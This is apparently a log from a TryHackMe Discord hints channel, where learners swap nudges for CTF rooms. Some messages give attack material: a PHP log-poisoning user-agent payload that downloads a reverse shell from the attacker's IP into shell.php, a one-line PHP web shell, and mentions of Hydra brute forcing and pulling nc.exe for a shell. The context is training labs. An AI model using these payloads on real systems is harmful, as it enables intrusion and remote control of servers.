#room-hints

1 messages Β· Page 21 of 1

stuck fractal
#

There's answer tolerance, so it's not likely to matter for longer answers

dusky vigil
#

For anyone doing the dogcat room, walkthrough is out

upper heath
#

nice, gonna spend some more time trying to figure out flag4 before i watch

late lark
#

guys could u help me with the year of the rabbit room

#

i have gained access to eli

#

but want access for gwendoline

#

?

dusky vigil
#

take the note you find literally

#

look around

late lark
#

Check our leet s3cr3t hiding place?

late lark
#

got it

#

thanks

lofty flicker
#

The question is so simple and everything I try to type in just doesn't seem to work

jaunty pivot
#

What room is this?

lofty flicker
jaunty pivot
lofty flicker
#

hmm I used that too, not sure what I am doing wrong

hasty gust
#

@dusky vigil - thanks for posting that walkthrough. I actually tried that ||php|| command in dogcat, I guess I got the syntax wrong. Do'h

jaunty pivot
#

@lofty flicker may be overthinking it. Question is just asking for the number base.

whole falcon
#

ummm i have a que about agent sudo room

glossy basin
#

@whole falcon ask it

#

which task or question are you on?

whole falcon
#

task 2 que 2 what i means how would you redirect yourself to a secret website

ornate narwhal
#

Somebody please help me with Game zon room, last task last question.. i need some hint.. wonder is it me doing somehting wrong, or the deployed machine acting crazy.. any hit is welcome

#

doesnt matter what payload i choose i cant connect to the machine

cobalt rock
#

anyone can help me with the last task of the room 'learn linux' ?

white salmon
#

Can you be more specific as to what you require help with as it will help others to help you.

ornate narwhal
#

have you done this room ?

plucky adder
#

hint for flag 4 dogcat please?

thin valley
#

@stark glen check what the user you gained can run as root

dusky vigil
#

@plucky adder check your hostname on the box

stark glen
#

@thin valley by using (sudo -l) right???

thin valley
#

@stark glen yes indeed

stark glen
#

I will check it now @thin valley

thin valley
#

@stark glen Good luck!

cobalt rock
violet fog
#

I suppose learn linux room. Sometime there are hidden users files try to catch them

#

Try find

cobalt rock
#

ok I will try

stark glen
#

@thin valley thanks a loooot bro🌹🌹 i have got the flag

thin valley
#

@stark glen you welcome! keep the hard work πŸ’ͺ

sick sun
#

Dogcat Nice Room πŸ˜„

eager flax
#

Hey guys i'm currently at "The Cod Caper", last task to crack the hash

#

||Well, it takes time for sure.. :D||

frank dirge
#

Hey!! Trying to exploit CVE 2019-1388 on a Windows 2016 Server.

stuck fractal
#

Retro/ Day 13?

frank dirge
#

But I can't get it to open a browser or any application!!

#

Retro/ Day 13?
@stuck fractal Yes

stuck fractal
#

Yeah that's intentional

#

Or the writeups for the box

onyx bramble
#

@frank dirge Did you check your VPN connection? Or you can try to restart the VM

frank dirge
stuck fractal
#

@onyx bramble That doesn't matter

onyx bramble
#

oh, thought it was a room

stuck fractal
#

@onyx bramble It is, but the issue isn't with the VPN

white salmon
#

Hello my "problem" its about juiceshop room task 5, i want to reset jim's password to find the answer of the secret question but im kinda lost, some ideas?

stuck fractal
#

OSINT

frank dirge
#

@stuck fractal so the intended way is to launch both the browser and then launch the exploit again right?

stuck fractal
#

There's another way

frank dirge
#

@stuck fractal Spamming the Ok button?

stuck fractal
#

no

inland onyx
#

Amusingly

stuck fractal
#

Different privesc

white salmon
#

Hey guys

Doing WebAppSec 101
I'm trying to use a battering ram attack to bruteforce a username and password with burpsuite
The free edition of burp is throttled though, any good alternatives?

inland onyx
#

That actually works

#

Theoretically

stuck fractal
#

@white salmon Hydra, wfuzz

white salmon
#

Perfect, appreciate it

frank dirge
#

@stuck fractal kernel privesc?

stuck fractal
#

Kernel?

#

Keep looking

frank dirge
#

@stuck fractal a little help. Is there any other privesc in this box?

#

Or is this the only one?

stuck fractal
#

There's more than one

#

Look at writeups if you get stuck

white salmon
#

@stuck fractal I overcomplicated the question I was on, got it a different way, cheers

frank dirge
#

@stuck fractal Okay. Looking around. Although almost all the write-ups are using the 2019-3688

white salmon
#

Is there anyone who can help me with a nudge for β€œJack”?

frank dirge
#

Let me try. What's your problem @white salmon ?

signal perch
#

hi there, I would need some hint / help for https://tryhackme.com/room/thecodcaper the cod caper room, task#5 "what is my ssh password". Following the instructions the two files that I found valuable are || ssh/id_rsa and ssh/id_rsa.pub || when I "cat" those 2 , I see information but dunno what should be my next move , any suggestions ?

tidal sedge
#

Look for files belonging to all users

signal perch
#

okay

signal perch
#

oh boy, I got the password !

#

πŸ˜„

white salmon
#

@signal perch nice!

white salmon
#

@frank dirge I don’t have much time my account expires . Which word list ? Rock you ETA is 10 hours

white salmon
#

I mean

#

Theoretically you could just keep extending

#

@white salmon

#

I did but then fell asleep

noble tinsel
#

could anyone help me with the intropython challenge? I'm getting the error "TypeError("argument should be a bytes-like object or ASCII not 'TextIOWrapper'" when I read the file and try to decode it.

#

google says to convert to ASCII use the ord() function but that converts strings. could anyone provide a helpful hint please?

#

google says to convert to ASCII use the ord() function but that converts strings. could anyone provide a helpful hint please?
@noble tinsel **converts chars

stuck fractal
#

Not without seeing the code

#

But that's the wrong method

noble tinsel
#

what is the right method? it mentions it's encoded 5 times with base 16, 32 and 64 so I thought I was missing a step

stuck fractal
#

You need to actually read the file

#

Have you tried working through the room first?

#

It covers reading files

noble tinsel
#

yes i worked through the room. I see the error now ill keep at it. thanks

night cave
#

I wonder if that script would even work.

dusky vigil
#

It wouldn't I don't think

stuck fractal
#

@floral spindle yes. You need to follow the other instructions

#

Create the variable

#

Otherwise it will crash

mental osprey
#

Can anybody assist me with The Cod Caper?
Please DM me πŸ™‚

inland onyx
#

Just ask here, or in #room-help if you want more than a hint πŸ™‚

mental osprey
#

If I have the users private key, should I still be prompted for a password when I ssh in?

#

I also tried uploading my public key, but I am not having any luck 😦

inland onyx
#

@mental osprey you should, yes. That only works under very specific circumstances

#

The key also needs to be properly formatted and permissioned, or it will just be ignored

mental osprey
#

Yeah I did format the private key and give it the right permissions...
If I have uploaded my public key to the server though (it isn't password protected), howcome I can't SSH into the box with it?

#

@inland onyx Can I DM you with some more info?

inland onyx
#

If you uploaded YOUR public key to the remote user's .ssh/authorized_keys file, then that will work

white salmon
#

is that box Panda?

#

or Food?

stuck fractal
#

@white salmon not koth

white salmon
#

ooh ok nvm

mental osprey
#

@inland onyx Yeah I had done that... Can you maybe just assist with where to find the user's SSH password?
I think the SSH attempt isn't working for me 😒

stuck fractal
#

Look for files belonging to all users

#

That's the hint I always see

inland onyx
#

If this is for Cod Caper, yeah, you're better just searching for files belonging to other users

spiral stag
#

i had a simular issue there searching for files owned by ||pingu||

#

no pw file to be found

#

||find / -user pingu -type f 2>/dev/null||

stuck fractal
#

Who says it's owned by that user?

spiral stag
#

||pingu||

#

says

#

Assuming my father hasn't modified since he took over my old PC, I should still have my hidden password stored somewhere,I don't recall though so you'll have to find it! find is the recommended tool here as it allows you to search for which files a user specifically owns.

stuck fractal
#

Doesn't mean it's owned by them

mental osprey
#

How do you tag spoilers?

spiral stag
#

double pipe

#

||

#

|| ||

#

im dying

white salmon
#

@spiral stag don't die

spiral stag
#

πŸ™‚

#

was a fun box tho

#

im loving pwntools

white salmon
#

😁

wraith fulcrum
#

I am totally stuck on jack escalation to root

tidal sedge
#

@wraith fulcrum You can pm if you need a hint πŸ˜„

#

Don't post spoilers here

wraith fulcrum
#

kk

halcyon citrus
#

Room Linux challenges .Task 2 no 7..give hints to find out the flag7

glossy basin
#

sure let me check my notes

#

@halcyon citrus you need to list ALL process running, especially system ones

halcyon citrus
#

by using systemctl command ?

glossy basin
#

no

#

google how to list all processes

halcyon citrus
#

ps command?

glossy basin
#

yup

halcyon citrus
#

got it! @glossy basin

glossy basin
#

good! 😺

stuck fractal
#

I did it like 3 days ago, DM me your answer @small mortar

halcyon citrus
#

can you help me in one more task.task2 no 10 @glossy basin

steady stratus
#

+1 let me know if it's something I need to investigate @stuck fractal

glossy basin
#

mhm 1 sec

halcyon citrus
#

from the same linux challenges room @glossy basin

stuck fractal
#

@steady stratus might be worth checking

steady stratus
#

Mhm aye, yeah either lemme know what Nuclear's answer is or @small mortar you can dm me and I'll verify πŸ™‚

stuck fractal
#

Nope nvm

glossy basin
#

@halcyon citrus but there's a hint in the question

stuck fractal
#

Answer correct, prompt missed

glossy basin
#

it's more than enough

steady stratus
#

Ah okies

#

nice!!

halcyon citrus
#

i searched through home directory, i haven't found flag 10 file @glossy basin

glossy basin
#

@halcyon citrus check the hint

halcyon citrus
#

ok i will check @glossy basin

glossy basin
#

just read the file stated there

#

and you'll get it

halcyon citrus
#

just one hint is it a txt file ? @glossy basin

tawny bluff
#

do the VM's in rooms have internet access? Asking because the exploit that needs to pull nc.exe from your webserver will work if I give it the internal ip of the Kali box, and will not work when using the public IP address of the Kali box.

stuck fractal
#

No they don't have internet access

#

Only the kali VM has internet access

tawny bluff
#

ok, great now I understand why it wasn't working with public IP. thanks

glossy basin
#

just one hint is it a txt file ? @glossy basin
no

#

it's inside the file stated in the hint

halcyon citrus
#

got it bro. easy one but i searched in wrong place @glossy basin

glossy basin
#

good good πŸ˜„

white salmon
#

May someone give me a hint in webappsec101 [task 4]? I think im making the hydra command wrong

glossy basin
#

@white salmon there's no bruteforce in that room

#

read the hint

white salmon
#

it gives me a list of usernames, thought i needed to bruteforce or something @glossy basin

crimson helm
#

is this where i get noob help?

white salmon
#

what do you need? :)

glossy basin
#

@white salmon no, check the pictures inside the app

#

and see who posted them

#

and you get the answer :)

crimson helm
#

ok so, i am on the burpsuit room, and i am unable to load https websites after adding the certificate (i am connected to the proxy)

#

it doesnt give me the error message it just doesnt load

white salmon
#

look burpsuite

#

you just need to click forward to let it load

crimson helm
#

oh i see, can i forward all ?

white salmon
#

well, you can just intercept from a specific ip

#

so it doesnt intercept everything

#

@crimson helm

crimson helm
#

oh! i see how this works now! thanks

white salmon
#

np ^^

#

@glossy basin i kina don't understand what you say, asks me to log in if i click in a picture

glossy basin
#

are you logged in

#

?

#

in first 2 questions of task 4 you get credentials

white salmon
#

as admin

#

but thank you i think i get what i need to do

#

yeah got it thank you :D

glossy basin
#

good!

#

:)

stuck fractal
#

@crimson helm ... can you not?

#

It's not in the slightest bit relevant

crimson helm
#

my bad wrong channel

little stirrup
#

Hi, everybody! I'm looking for a hint on the Day 2 challenge of the Advent of Cyber room. I ran dirbuster using the wordlist as instructed but I haven't found anything suspicious. What am I missing? Thanks.

still elm
#

about bruteforcing hackpark login page, am i supposed to use the switch for ssl connections? i'm running rockyou, but without results

stuck fractal
#

Is it an SSL connection?

#

If not, don't use SSL

still elm
#

πŸ˜… i've made a mistake with zap and the page appeared with the zap ssl certificate

#

i've received 16 good passwords... i think hydra is not working properly

rapid hamlet
#

does anyone have any idea how to complete flag 26 in linuxctf?

glossy basin
#

@rapid hamlet use find command

rapid hamlet
#

@glossy basin yes, but I've used it and no luck at all

glossy basin
#

should be useful with it

rapid hamlet
#

kk

#

tyty

still elm
#

can someone help me with hackpark bruteforcing? i think the hydra command is right, but i keep receiving a lor of false positives

stuck fractal
#

Normally means you odn't have the command right

#

Especially after the last colon

still elm
#

ok, thanks @stuck fractal . i was filtering based on fail and not on success

stuck fractal
#

huh?

#

The bit after the last colon should be how it detects a failed login

still elm
#

i've used ||S=/admin||

stuck fractal
#

@still elm Does that appear in failed requests?

still elm
#

i've got the ?ReturnURL= in the POST request, so i stripped out that part and added it as a success

stuck fractal
#

"S=" is that how hydra works?

still elm
#

from hydra -U http-post-form
Third is the string that it checks for an *invalid* login (by default) Invalid condition login check can be preceded by "F=", successful condition login check must be preceded by "S=".

covert basalt
#

(ALL : ALL) NOPASSWD: /bin/mount /dev/*
i found this through sudo -l
how to use it to priv esc

inland onyx
#

That strikes me as being a little more than a hint

#

Also, well done getting through the RSA...

covert basalt
#

i can't seem to find a way past that

#

thanks

stuck fractal
#

@still elm Interesting

#

I've only ever seem that fail

covert basalt
#

got the password but not the flag kinda different and interesting @inland onyx

white salmon
#

Can anyone tell me which password dictionary to use for Jack ? I have tried for days rockyou

stuck fractal
#

@white salmon Then you've been trying wrong

#

I got a login with that

dusky vigil
#

Can anyone tell me which password dictionary to use for Jack ? I have tried for days rockyou
@white salmon how about, you try some of seclists

sinful plaza
#

can anyone help with hint on year of the rabbit

#

???

inland onyx
#

Where are you stuck @sinful plaza?

pure thistle
#

Hello new to THM started the blue room on this past Sunday 04/19/20. I got to the end of task 3 , ran the metasploit exploit it says it ran the exploit but did not start a shell. I've tried restarting the room several times in the past 2 days . Question is there something else I need to install on my computer for metasploit to actually connect with a shell?

inland onyx
#

Is your VPN on the host or VM @pure thistle?

pure thistle
#

Host? It's on my computer in my thm folder

inland onyx
#

What OS are you using?

pure thistle
#

Mint19

#

Could it be a problem with terminator should I just use the default terminal that comes with Mint19

inland onyx
#

Nah

#

Chances are that it's just EternalBlue being iffy

#

It's not the most stable of exploits

#

Keep trying

pure thistle
#

Ok thanks

stuck fractal
#

@pure thistle Also, make sure you're using your TryHackMe VPN IP as your LHOST

inland onyx
#

^^

pure thistle
#

Humm ok . I thought it said I only had to set RHOST but I will check the LHOST tomorrow thanksninjajc01

#

Oops. NinjaJc01

white salmon
#

Im not sure how to do the Learn Linux room

#

on task 11

#

I did 'touch noot'

stuck fractal
#

@white salmon That created a file, called "noot" not "noot.txt"

white salmon
#

Understood

hexed cedar
#

@white salmon you have to add your extension to the file. (.txt)

white salmon
#

I think I might have to be connected my machine

#

For it to work

inland onyx
#

...

#

Did you create that file on your own machine?..

white salmon
#

Just in case

hexed cedar
#

Are you ssh’ed into the box you deployed??

white salmon
#

No

hexed cedar
#

No to which question ?@white salmon

white salmon
#

ssh

inland onyx
#

Did you skip the first few tasks?

white salmon
#

No

hexed cedar
#

You have to connect to the deployed box in order to capture your flags

white salmon
#

They havent taught me ssh

#

this one is my first machine

inland onyx
#

Connecting to the machine is covered in the first few tasks of the room

hexed cedar
#

Its in task 2 I believe

white salmon
#

I seemed to have forgotten it

#

But yes your right

hexed cedar
#

Did you download the access file for openvpn?

inland onyx
#

Yeah, we already had that conversation..

hexed cedar
#

Copy.

inland onyx
#

You're on Mint, right?

#

ssh shiba1@<Machine_Ip>

#

Password is shiba1

hexed cedar
#

Yeah, then all you have to do is deploy the box, ssh into it, and knock out each task. I’d advise not skipping any steps. Cheers! @white salmon

white salmon
#

Yay

#

I did it

hexed cedar
#

πŸ™ŒπŸΌ

cloud perch
#

Okay so I need a hint on the lfi box I have the ssh key I changed permission to 600 and I'm still getting invalid format. What am I doing wrong?

stuck fractal
#

@cloud perch invalid format means the format isn't quite right. Check the proper format for a key and check what you have

crimson helm
#

Hello I'm on vulnversity again, and I'm having trouble with task five question one

#

The hint doesn't help as it is a command that just shows me what looks to be like every file with a permission denied statement

cloud perch
#

@stuck fractal yeah I fixed it. Thanks already completed the machine

bright steeple
#

Hi, I'm in the Common Linux Privesc room, and I'm stuck on the exploiting writable /etc/password part where i need to hash the password with " openssl passwd -salt [new] [123]", is the output i got from running this command the answer to the question or i need to look somewhere else for the answer

#

openssl passwd -1 -salt [new] [123]

#

I tried the output i got from the command, its not the right answer, where else can i look for this salted password?

crimson helm
#

Ugh I'll just leave the room for now, don't think much help will be offered at midnight (I thought u hackers like the dark)

tardy drum
#

@crimson helm There's a way to filter out the permission denied statements

crimson helm
#

Oof, how's that? and do you know if that will filter out what I'm looking for in the question?

tardy drum
#

so append 2>>/dev/null to your command

#

note that /dev/null essentially trashes any input it's given and 2 is short for stderr (error messages)

crimson helm
#

I got it, however it doesn't really stand out from any other file, it is called systemCTL

#

Sorry to b a noob but I ran it, and I am unable to find any txt files in the output

#

Or root directory

tardy drum
#

before finding the .txt files, try to do what question 1 says about finding all suid files

#

(check the hint)

bright steeple
#

@tardy drum can you help me out

tardy drum
#

sure @bright steeple

crimson helm
#

Is there something im supposed to do with systemctl? Or am I just being pointed in the wrong direction

violet fog
#

No there is

#

@crimson helm you can Cat some high level files tipsfedora

crimson helm
#

The results that come from systemctl, are they like files?

tardy drum
#

@crimson helm That's a good question for google

bright steeple
#

@tardy drum I'm in the Common Linux Privesc room, and I'm stuck on the exploiting writable /etc/password part where i need to hash the password with " openssl passwd -salt [new] [123]", is the output i got from running this command the answer to the question or i need to look somewhere else for the answer

tardy drum
#

@bright steeple I haven't done that room yet because i am not a subscriber

crimson helm
#

Found some useful material, but I still don't know how to cat a service

tardy drum
#

@crimson helm try searching up "systemctl privescs"

bright steeple
#

@tardy drum ok

crimson helm
#

Yeah I still am a little lost, I'll just get on tommorow

#

Well today but later since it's 1 am

#

Rip

cloud perch
#

Who's done the dogcat box already I need a hint for the first flag it saids there more to view. But I'm confused

wraith fulcrum
#

anyone has been able to root Jack "the proper" way?

spiral stag
#

anyone for a sanity check on radare the_final_exam?

#

i think i know what happens in ||sym.get_password|| but cant get it to work

white salmon
#

hello

#

Morning @white salmon

#

morning @white salmon i was about to ask a question and i remembered that i haven't done any research yet

#

does sqlmap show you the types of injection a server is vulnerable to

#

SQLmap isn't really my forte however I believe it does.

#

I'm sure somebody with better experience of it will be able to better answer your question.

#

Or Google πŸ˜‰

#

i am trying to look and i cant seam to wrap my head around that idea

#

yeah i am trying to go over the manual page now

#

@white salmon have you done a manual sqli

shadow basin
#

hi all

white salmon
#

you see i have found 2 but the question said bang... wrong answer

#

Remind me which topic and question your on Prexe

#

Hi @shadow basin

#

finding How many types of sqli is the site vulnerable too

#

Which topic?

#

by topic you mean...

#

ccpentesting

violet fog
#

@white salmon interesting

white salmon
#

i know that sqlmap test for 5 vulnerabilities

violet fog
#

@white salmon have you tried to formulate the SQL query

white salmon
#

boolean based
Time-based
error-based
UNnion
and stacked

#

@violet fog didn't do it manually

#

is there something i am missing?

#

okay OWASP TG

white salmon
#

Is there anyone who can help me with dictionary for jack

inland onyx
#

@white salmon mate, in the time you've been asking, you could easily have just tried it yourself.
Pretty sure I've already said this, but these channels are for helping people with things they don't understand.
You've been told that the dictionary you need comes preinstalled with Kali: that's your hint.
No one is going to go further than that. Go have a try for yourself -- we're not here to do it for you.

white salmon
#

I’ve tried rockyou.

tidal sedge
#

||The password is not in rockyou....||

white salmon
#

@tidal sedge seclist?

tidal sedge
#

Just go try random wordlists I'm sure you'll **eventually **find it.

white salmon
#

I’ve spent days running rockyou. I just want to complete this box before my OSCP exam

tidal sedge
#

||The password is not in rockyou.||

white salmon
#

That helps. I’ll try others . Thank you

light tartan
#

hey i'm having a problem with running the msf exploit for steele mountain
it says exploited completed but no session is made

merry sonnet
#

@white salmon I had issues with jack and brute forcing. there is a good list but sometimes it won't hit on a successful login even though the password is in that last.

#

lis*

#

list*

echo thunder
#

hello all

#

who completed the challange syfonos6?

#

can you ping me please

#

?

dusky vigil
#

Just ask your question here and hope someone helps

echo thunder
#

there is a bug regarding flyspray that I don't know for what reason is not working to me at all. I've tried to restart the vm several times but no success

#

I am uploading the script file in order to create a new admin user and for some reasons is not creating the user

eager flax
#

i hit a wall on the dog cat room

#

i can't get a reverse shell 😦

#

have been trying for over 10 hours

mellow vale
#

!writeup plethora

proud scarabBOT
robust hearth
#

@eager flax i had that problem to try to use something like this ||<? file_put_contents('shell.php', file_get_contents('YOURIP/SOMEREVERSESHELL')); ?>||

#

||set it as a custom user agent and navigate to a page where you can view some logs....||

echo thunder
#

there is a bug regarding flyspray that I don't know for what reason is not working to me at all. I've tried to restart the vm several times but no success
I am uploading the script file in order to create a new admin user and for some reasons is not creating the user

eager flax
#

@robust hearth thx for the suggestion, i already tried that some hours ago without luck

stuck fractal
#

Are you using a VM?

eager flax
#

my tiredness and frustration have build up already for the day, i might try once more...

#

@stuck fractal yeah

stuck fractal
#

And you're setting the LHOSt in the rev shell to your VPN IP/

eager flax
#

no

#

the ip from my vm

stuck fractal
#

Subscriber kali?

eager flax
#

the thing is i cannot upload the php-reverse-shell and when i do with curl i cannot locate it anywhere 😦

#

yeah subscriber kali

#

the one-liners don't work

cobalt rock
#

In the room Vulnversity they ask to use a wordlist which I don't have in my Kali system (using windows 10 with the subsystem linux) I downloaded dirbuster-ng on Github but none of the list are working.
Any help here ?

stuck fractal
#

Avoid WSL

eager flax
#

wsl?

stuck fractal
#

Not you

eager flax
#

ok

#

i see..

stuck fractal
#

@cobalt rock You can get wordlists for directory bruteforcing, but still I recommend avoiding WSL kali for a few reasons

remote gate
#

@eager flax try hosting your shell instead of using a one liner

eager flax
#

i only tried one liners as an extreme measure

#

but no lick

stuck fractal
#

I mean you have RCE

#

Think about how your RCE works

#

And what kind of RCE you have

#

Also make sure you're using the LAN IP not the public IP for the kali VM

eager flax
#

yeah i use the lan ip

remote gate
#

@eager flax as @stuck fractal mentioned you have RCE. Google LFI to RCE. Should help

stuck fractal
#

@remote gate Oh no, it's not ||log poisoning|| is it?

#

I need to try it still

eager flax
#

yes it is

#

i have been through this

#

i will once more

remote gate
#

@stuck fractal it might be

eager flax
#

i suck on webapps 😦

remote gate
#

Did you see your shell uploaded then browse /shell.php or whatever the name of the shell you uploaded is?

robust hearth
#

i just downloaded pentest monkey reverse php shell spawned a webserver using python and uploaded it, with ncat listening on a port on my win machine

eager flax
#

i did saw them on http server getting requested and transfered

#

and then i cannot find the file to run it

remote gate
#

Should be just /shell.php

eager flax
#

yeah i know

robust hearth
#

normally that would be IP/FILE

eager flax
#

@robust hearth how did you send it over?

#

i only could with curl

#

wget doesn't work for me

robust hearth
#

||<? file_put_contents('shell.php', file_get_contents('http://IP/shell.php')); ?> set that as my header user agent in tamper on google chrome||

eager flax
#

i tried that, i always getting an error trying to resolve

robust hearth
#

weird that did the trick for me...

eager flax
#

i'm trying once more

robust hearth
#

I'm using the pentest monkey php shell btw but it should work with any shell....

#

ofc if you executed faulty php code ||in the logs|| before that one you should reboot the machine :p

eager flax
#

i've rebooted the machine ~10 times today πŸ˜„

remote gate
#

Try it with pentesting monkey shell?

cobalt rock
#

@stuck fractal why you don't recommend using WSL ? What are the other free options ? pendrive with kali / dualboot / virtual machine ?

inland onyx
#

WSL can be really interesting over a network

#

By interesting

#

I mean, it frequently doesn't work very well

cobalt rock
#

well in this case I'm just missing the worlists's files to use with gobuster

stuck fractal
#

@cobalt rock Virtual machine

#

basically, WSL is quite restrictive

cobalt rock
#

@stuck fractal Ok thanks !

eager flax
#

doesn't work

#

😦

#

i'm going to take a break and try again

#

i'm doing something wrong 😦

robust hearth
#

im having trouble with that pumpkin ctf wireshark thing

#

last question about that audio file what should i even put in everything is returning me an error

#

is it like the show or something or the girl saying it? cause it really isn't working

restive light
#

Hi! I am having trouble with one of the "Steel Mountain VM. I am at [task 2] Initial Access and for several hours I've trying to use Metasploit to gain access with "windows/http/rejetto_hfs_exec" and the error keeps repeating server stopped. I also tried the kali browser to see if it was my kali vm but I get the same error. I am I missing something because I thought the step was pretty straight forward by adding the RHOSTS = Target IP

white salmon
#

@eager flax there are writeups for it if you really get stuck. I ||used burp to intercept the page then included something like "<?php echo system($_GET['lfi']) ?>" in one of the lines||

eager flax
#

@remote gate I appreciate your devotion to help me solve my issues with the box man! Thank you a lot!

#

@stuck fractal Thank you too bud for your help

vestal igloo
#

any tips for agent sudo's priv esc? I cant manage to find the CVE I've tried linenum and three exploit suggesters on the target machine

inland onyx
#

Have a look at some of my tutorial rooms @vestal igloo πŸ™‚

#

It's covered on the site

eager flax
#

@eager flax there are writeups for it if you really get stuck. I ||used burp to intercept the page then included something like "<?php echo system($_GET['lfi']) ?>" in one of the lines||
@white salmon tried that but didn't help.. I managed to get shell with some help from #room-hints

dusty pebble
#

@restive light Check the RPORT πŸ˜‰

vestal igloo
#

@inland onyx excuse my ping just wanted to thank you since I was stuck for a while

inland onyx
#

Np

white salmon
#

I thought the second common private home range was ||192.186.1.1||?

stuck fractal
#

@white salmon That's not the range, that's an address in the range

#

the way you notate the network ends in a 0

white salmon
#

oh

#

thank you

white salmon
#

i'm stuck in the beginner room for linux, i can't find how to run a binary file 😩 any hint ?

stuck fractal
#

@white salmon Re read the tasks

#

it tells you how

#

There's literally a task with the title "running a binary" @white salmon

white salmon
#

ok thanks

dense marlin
#

hey guys can i get some hint for agent sudo codename part?

-i've found out tht it's a ubuntu machine so i tried all the ubuntu version codenames but still it doesnt work

stuck fractal
#

I don't know the actual method

#

Try a lil OSINT

dense marlin
#

i try to find the alien picture too

#

end up in the fb page

stuck fractal
#

You're not meant to end up on facebook IIRC

dense marlin
#

ok i'll give OSINT a try thanks for the hint @stuck fractal

stuck fractal
#

@dense marlin Agent R?

dense marlin
#

agent r is the person announcing right?

stuck fractal
#

R signed a lot of the letters yeah @dense marlin

dense marlin
#

seems like a clue for me thanks man

#

@stuck fractal i think i found a way to pass it without using OSINT

stuck fractal
#

I think I kinda guessed it

dense marlin
#

as agent R, the codename is single character right

#

so i just use my burp intruder to help me out testing each char, and found a good php page man

stuck fractal
#

Interesting

dense marlin
#

indeed, it's an interesting room

heady pulsar
#

Currently stuck on Task 11 in the CTF Collections vol.1 room.

It gave me a .png binary file, which I converted to Hex.
I tried to put the file through CyberChef but it says invalid file format.

Just wondering if I'm missing a step in between?

#

Oh nvm, finally figured it out πŸ™‚

bright steeple
#

Currently stuck on the WebAppSec 101 room, where I have to look for a log in username, the hint is to look at a name list on github. but what should i do with the name list?

#

i tried using the medusa brute force with the name list but it doesnt seem to work out

#

can someone give me a hint?

cloud perch
#

has anyone done steel mountain

#

did anyone else have a hardtime getting the powerup.ps1 on steelmountain to run

white salmon
#

@bright steeple actually i didnt use that, I'll just say check pictures and see who uploaded them

late patio
#

hello

white salmon
#

hi

late patio
#

you need a hint?

white salmon
#

oh no :)

late patio
#

sweet. lol

long fog
#

Can anyone help me in CC stegnography Final Exam, I found port 80 open, so opened it in browser but can't find any key

stuck fractal
#

@long fog it's steg. Look for steg

white salmon
#

Looking at the new strings room. Question 1.3 is ||
What is the name of a type of data that could be stored within a string?|| but not sure of the answer, it's not really clear what it's asking for although think I'm probably being stupid, I've tried ||usernames, passwords, credentials|| but think I'm missing something

steady stratus
#

think a bit more high-level @white salmon stuff like usernames for example are text

white salmon
#

Hmm, okay, will have a think. Cheers πŸ™‚

steady stratus
#

what would you class a pin number as? (I'm gonna add that as a hint to clarify a bit better)

#

(rhetorical question btw)

white salmon
#

Sigh, got it. I suck lol
Cheers

steady stratus
#

πŸ™‚

white salmon
#

Im stuck on shiba2 on the learn linux room

karmic acorn
#

im stuck

white salmon
#

And I need hints

karmic acorn
#

Advent of Cyber - Ho-Ho-Hosint, stuck at number #2 and #4

stuck fractal
#

@white salmon Create the variable, set it to $USER

karmic acorn
#

nevermind finished #2 just #4

stuck fractal
#

@karmic acorn If it's the question I think it is, some math

white salmon
#

||export test1234=$USER||

#

Im not sure what to do next

stuck fractal
#

Run the binary? @white salmon

white salmon
#

oh lol

karmic acorn
#

@stuck fractal something about date

#

What date did Lola first start her photography? Format: dd/mm/yyyy

stuck fractal
#

@karmic acorn Yea, so IDK what you've found

karmic acorn
#

idk?

tranquil wing
#

i know you shouldnt help me, but the php reverse shell for vulneristy doesnt seem to work for me? im using my internal ip and listening with port 1234 (netcat) any suggestions why it keeps failing and saying connection timed out?

stuck fractal
#

@tranquil wing we shouldn't help you?

#

Where's your VPN running?

tranquil wing
#

its for uop vulnersity room, its running on my pc whilst im using kali vm on the site

stuck fractal
#

Then you need to use that kali VM's IP

tranquil wing
#

oh ok

stuck fractal
#

Just don't say UoP vulnversity

#

Just say vulnversity

#

They're identical other than Tobi adding some files

tranquil wing
#

ah wondered why it said vulnersity, thank you

stuck fractal
tranquil wing
#

ah ok i see what hes done, cool thanks man

#

worked a charm, thanks again

iron crystal
#

doing the HackPark room and I can't seem to find the right flag for what the OS version is. Its not the OS Name or OS Version from systeminfo and its not what it says windows exploit suggester says it is. Can anyone help?

wheat gorge
#

can i get a hint on the last problem for zthlinux

stuck fractal
#

@wheat gorge Look for files belonging to each user

white salmon
#

i can't understand the beginner first challenge in linux, run the binary file, i can't find it, any clue

#

?

#

learn linux room? @white salmon

#

yes

#

which task?

#

first challenge task 11

abstract glen
#

Have you read the note to that task?

white salmon
#

yes

#

just run shiba1

#

i gonna try again

#

yes ! thanks

#

i'm realy dumb πŸ™‚ this challenge took me a day πŸ˜†

abstract glen
#

not dumb, still learning

white salmon
#

^

dusk bobcat
#

Just started steel mountain unable to figure out "Who is the employee of the month"

stuck fractal
#

@dusk bobcat Load the page

white salmon
#

For room Blue, how do i determine what the machine is vulnerable to?

#

is this another nmap command, or some other piece of information i need elsewhere?

abstract glen
#

@white salmon have you ran any nmap scripts?

white salmon
#

yup, scanned the machine for ports

#

the hint is Revealed by the ShadowBrokers, exploits an issue within SMBv1

#

is there an nmap feature im not aware of?

#

oops. yeah.

#

sorry. noob here

#

--script vuln facepalm

abstract glen
#

It's all good. Let me know if that tells you the answer. I had to boot up to check if it would

white salmon
#

yes it does!

#

what linux distro do you use, if you use one?

abstract glen
#

kali for now

white salmon
#

right, figured

#

ive used fedora for a long time thanks to my professor

hasty gust
#

hi all - SQLi labs. I've got this URL: http://<ip>/sqli-labs/Less-9/ .....how am I supposed to begin the SQLi? In general chat, someone said I should look at doing it via the URL, but, am I supposed to use dirbuster first? Just need a little push to get me going

#

Actually, I think i've got it (sorta). ||?id=1||

nocturne vault
#

anyone here done madness?

nocturne vault
#

nevermind... that's so dumb ffs

still elm
#

@nocturne vault do you need help?

nocturne vault
#

nah, got it

#

just thought the solution to the part i was stuck was pretty dumb

still elm
#

just thought the solution to the part i was stuck was pretty dumb
@nocturne vault i suppose you were stuck where i got stuck πŸ˜…

nocturne vault
#

probably πŸ˜„ ssh pwfacepalm

still elm
#

yep

echo thunder
#

hello all

patent jacinth
#

https://tryhackme.com/room/introtopython the challenge on this is driving me up the wall. πŸ˜† When looping through decoding I 16 and 64 bit are fine when encoding, but b32 claims to have non-32 bit chars even when encoded

echo thunder
#

I am trying to do the challange of jack of all trades but firefox is telling me that the page is restricted. I tried to go on about:config and add the network.security.ports.banned.override

#

but is not working even after that

#

any ideea on how I should resolve this?

patent jacinth
#

Mine is sorted πŸ˜›

mental lichen
#

